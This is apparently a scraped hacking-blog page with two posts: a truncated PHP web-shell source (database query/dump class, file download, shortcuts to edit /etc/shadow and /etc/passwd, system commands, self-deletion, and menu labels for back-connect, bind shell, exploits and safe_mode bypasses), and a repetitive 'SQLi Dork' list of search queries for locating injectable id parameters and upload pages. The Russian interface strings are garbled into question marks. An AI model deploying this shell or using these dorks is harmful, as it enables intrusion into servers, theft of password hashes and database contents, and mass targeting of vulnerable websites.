if(empty($this->port)) { $this->port = '1433'; }
if(!@function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!@function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!@function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
case 'MySQLi':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysqli_connect')) return 0;
$this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
if(is_resource($this->connection)) return 1;
break;
case 'mSQL':
if(!@function_exists('msql_connect')) return 0;
$this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'SQLite':
if(!@function_exists('sqlite_open')) return 0;
$this->connection = @sqlite_open($this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
case 'MySQLi':
return 1;
break;
case 'mSQL':
if(@msql_select_db($this->base,$this->connection)) return 1;
break;
case 'SQLite':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
case 'MySQLi':
if(false===($this->res=@mysqli_query($this->connection,$query)))
{
$this->error = @mysqli_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'mSQL':
if(false===($this->res=@msql_query($query,$this->connection)))
{
$this->error = @msql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'SQLite':
if(false===($this->res=@sqlite_query($this->connection,$query)))
{
$this->error = @sqlite_error_string($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MySQLi':
$this->num_rows=@mysqli_num_rows($this->res);
$this->num_fields=@mysqli_num_fields($this->res);
while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
@mysqli_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'mSQL':
$this->num_rows=@msql_num_rows($this->res);
$this->num_fields=@msql_num_fields($this->res);
while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
@msql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'SQLite':
$this->num_rows=@sqlite_num_rows($this->res);
$this->num_fields=@sqlite_num_fields($this->res);
while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MySQLi':
$this->dump[0] = '## MySQLi dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'mSQL':
$this->dump[0] = '## mSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'SQLite':
$this->dump[0] = '## SQLite dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
case 'MySQLi':
@mysqli_close($this->connection);
break;
case 'mSQL':
@msql_close($this->connection);
break;
case 'SQLite':
@sqlite_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
case 'MySQLi':
return @mysqli_affected_rows($this->res);
break;
case 'mSQL':
return @msql_affected_rows($this->res);
break;
case 'SQLite':
return @sqlite_changes($this->res);
break;
default:
return 0;
break;
}
}
}
if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if($file=moreread($_POST['d_name'])){ $filedump = $file; }
else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
if(!empty($_POST['cmd']))
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100%>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['12']))
{
@unlink(__FILE__);
}
if(isset($_GET['11']))
{
@unlink($tempdir.'bdpl');
@unlink($tempdir.'back');
@unlink($tempdir.'bd');
@unlink($tempdir.'bd.c');
@unlink($tempdir.'dp');
@unlink($tempdir.'dpc');
@unlink($tempdir.'dpc.c');
@unlink($tempdir.'prxpl');
@unlink($tempdir.'grep.txt');
}
if(isset($_GET['2']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['3']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['4']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['5']))
{$_POST['cmd'] = 'systeminfo';}
if(isset($_GET['6']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
if(isset($_GET['7']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
if(isset($_GET['8']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
if(isset($_GET['9']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
if(isset($_GET['10']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
if(isset($_GET['13']))
{$_POST['cmd']='cat /proc/cpuinfo';}
if(isset($_GET['14']))
{$_POST['cmd']='cat /proc/version';}
if(isset($_GET['15']))
{$_POST['cmd'] = 'free';}
if(isset($_GET['16']))
{$_POST['cmd'] = 'dmesg(8)';}
if(isset($_GET['17']))
{$_POST['cmd'] = 'vmstat';}
if(isset($_GET['18']))
{$_POST['cmd'] = 'lspci';}
if(isset($_GET['19']))
{$_POST['cmd'] = 'lsdev';}
if(isset($_GET['20']))
{$_POST['cmd']='cat /proc/interrupts';}
if(isset($_GET['21']))
{$_POST['cmd'] = 'cat /etc/*realise';}
if(isset($_GET['22']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
if(isset($_GET['23']))
{$_POST['cmd'] = 'lsattr -va';}
if(isset($_GET['24']))
{$_POST['cmd'] = 'w';}
if(isset($_GET['25']))
{$_POST['cmd'] = 'who';}
if(isset($_GET['26']))
{$_POST['cmd'] = 'uptime';}
if(isset($_GET['27']))
{$_POST['cmd'] = 'last -n 10';}
if(isset($_GET['28']))
{$_POST['cmd'] = 'ps -aux';}
if(isset($_GET['29']))
{$_POST['cmd'] = 'service --status-all';}
if(isset($_GET['30']))
{$_POST['cmd'] = 'ifconfig';}
if(isset($_GET['31']))
{$_POST['cmd'] = 'netstat -a';}
if(isset($_GET['32']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
if(isset($_GET['33']))
{$_POST['cmd'] = 'fdisk -l';}
if(isset($_GET['34']))
{$_POST['cmd'] = 'df -h';}
#if(isset($_GET['']))
# {$_POST['cmd'] = '';}
$lang=array(
'ru_butt1' =>'?????????',
'ru_butt2' =>'?????????',
'ru_butt3' =>'???????',
'ru_butt4' =>'?????????',
'ru_butt5' =>'?????????',
'ru_butt6' =>'???????',
'ru_butt7' =>'???????',
'ru_butt8' =>'?????????',
'ru_butt9' =>'????',
'ru_butt10'=>'?????????',
'ru_butt11'=>'?????????????',
'ru_butt12'=>'?????',
'ru_butt13'=>'???????/???????',
'ru_butt14'=>'???????',
'ru_butt15'=>'?????????',
'ru_text1' =>'??????????? ???????',
'ru_text2' =>'?????????? ?????? ?? ???????',
'ru_text3' =>'????????? ???????',
'ru_text4' =>'??????? ??????????',
'ru_text5' =>'???????? ?????? ?? ??????',
'ru_text6' =>'????????? ????',
'ru_text7' =>'??????',
'ru_text8' =>'???????? ?????',
'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
'ru_text10'=>'??????? ????',
'ru_text11'=>'?????? ??? ???????',
'ru_text12'=>'back-connect',
'ru_text13'=>'IP-?????',
'ru_text14'=>'????',
'ru_text15'=>'???????? ?????? ? ?????????? ???????',
'ru_text16'=>'????????????',
'ru_text17'=>'????????? ????',
'ru_text18'=>'????????? ????',
'ru_text19'=>'Exploits',
'ru_text20'=>'????????????',
'ru_text21'=>'????? ???',
'ru_text22'=>'datapipe',
'ru_text23'=>'????????? ????',
'ru_text24'=>'????????? ????',
'ru_text25'=>'????????? ????',
'ru_text26'=>'????????????',
'ru_text28'=>'?????? ? safe_mode',
'ru_text29'=>'?????? ????????',
'ru_text30'=>'???????? ?????',
'ru_text31'=>'???? ?? ??????',
'ru_text32'=>'?????????? PHP ????',
'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)',
'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
'ru_text36'=>'???? . ???????',
'ru_text37'=>'?????',
'ru_text38'=>'??????',
'ru_text39'=>'????',
'ru_text40'=>'???? ??????? ???? ??????',
'ru_text41'=>'????????? ? ?????',
'ru_text42'=>'?????????????? ?????',
'ru_text43'=>'????????????? ????',
'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
'ru_text45'=>'???? ????????',
'ru_text46'=>'???????? phpinfo()',
'ru_text47'=>'???????? ???????? php.ini',
'ru_text48'=>'???????? ????????? ??????',
'ru_text49'=>'???????? ??????? ? ???????',
'ru_text50'=>'?????????? ? ??????????',
'ru_text51'=>'?????????? ? ??????',
'ru_text52'=>'????? ??? ??????',
'ru_text53'=>'?????? ? ?????',
'ru_text54
written by ejam at 04:00 am
Make a comment Permalink
SQLi Dork
Friday, December 02, 2011
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
news-article.php?id=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:order.php?cat_id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
allinurl:index.php?page=upload.php
allinurl:upload.php
allinurl:index of /upload.php
index of upload.php
inurl:upload.php
inurl:/upload/upload.php
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:Ripcheck;]?=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
news-article.php?id=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:order.php?cat_id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
allinurl:index.php?page=upload.php
allinurl:upload.php
allinurl:index of /upload.php
index of upload.php
inurl:upload.php
inurl:/upload/upload.php
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:Ripcheck;]?=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
